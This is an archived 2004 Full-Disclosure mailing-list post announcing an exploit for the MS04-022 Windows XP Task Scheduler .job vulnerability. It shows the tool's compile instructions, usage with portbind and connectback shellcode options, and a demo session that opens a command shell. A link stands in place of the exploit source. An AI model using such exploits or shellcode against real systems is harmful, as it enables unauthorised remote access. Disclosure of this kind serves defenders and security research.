[Full-Disclosure] (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
From: pigrelax (pigrelax_at_yandex.ru)
Date: 07/31/04
- Previous message: Ron DuFresne: "Re: [Full-Disclosure] Stateful Packet Inspection"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: <full-disclosure@lists.netsys.com> Date: Sat, 31 Jul 2004 10:34:20 +0400
Hi all!
Microsoft Windows XP Task Scheduler (.job) Universal Exploit
* Tested on:
* - Internet Explorer 6.0 (SP1) (iexplore.exe)
* - Explorer (explorer.exe)
* - Windows XP SP0, SP1
*
* -------------------------------------------------------------------
* Compile:
* Win32/VC++ : cl HOD-ms04022-task-expl.c
* Win32/cygwin: gcc HOD-ms04022-task-expl.c -lws2_32.lib
* Linux : gcc -o HOD-ms04022-task-expl HOD-ms04022-task-expl.c
*
* -------------------------------------------------------------------
* Command Line Parameters/Arguments:
*
* HOD.exe <file> <shellcode> <bind/connectback port> [connectback IP]
*
* Shellcode:
* 1 - Portbind shellcode
* 2 - Connectback shellcode
*
* -------------------------------------------------------------------
* Example:
*
* C:\>HOD-ms04022-task-expl.exe expl.job 1 7777
*
* (MS04-022) Microsoft Windows XP Task Scheduler (.job) Universal Exploit
*
* --- Coded by .::[ houseofdabus ]::. ---
*
* [*] Shellcode: Portbind, port = 7777
* [*] Generate file: expl.job
*
* C:\>
*
* start IE -> C:\
*
* C:\>telnet localhost 7777
* Microsoft Windows XP [Версия 5.1.2600]
* (С) Корпор ция М йкрософт, 1985-2001.
*
* C:\Documents and Settings\v.X\Р бочий стол>
*
http://www.securitylab.ru/46820.html
ЕЕЕЕЕЕЕЕЕЕЕ
MaxPatrol is a professional network security scanner distinguished by its
uncompromisingly high quality of scanning, optimized for effective use by
companies of any size (serving from a few to tens of thousands of nodes).
http://www.Maxpatrol.com
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
- Previous message: Ron DuFresne: "Re: [Full-Disclosure] Stateful Packet Inspection"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
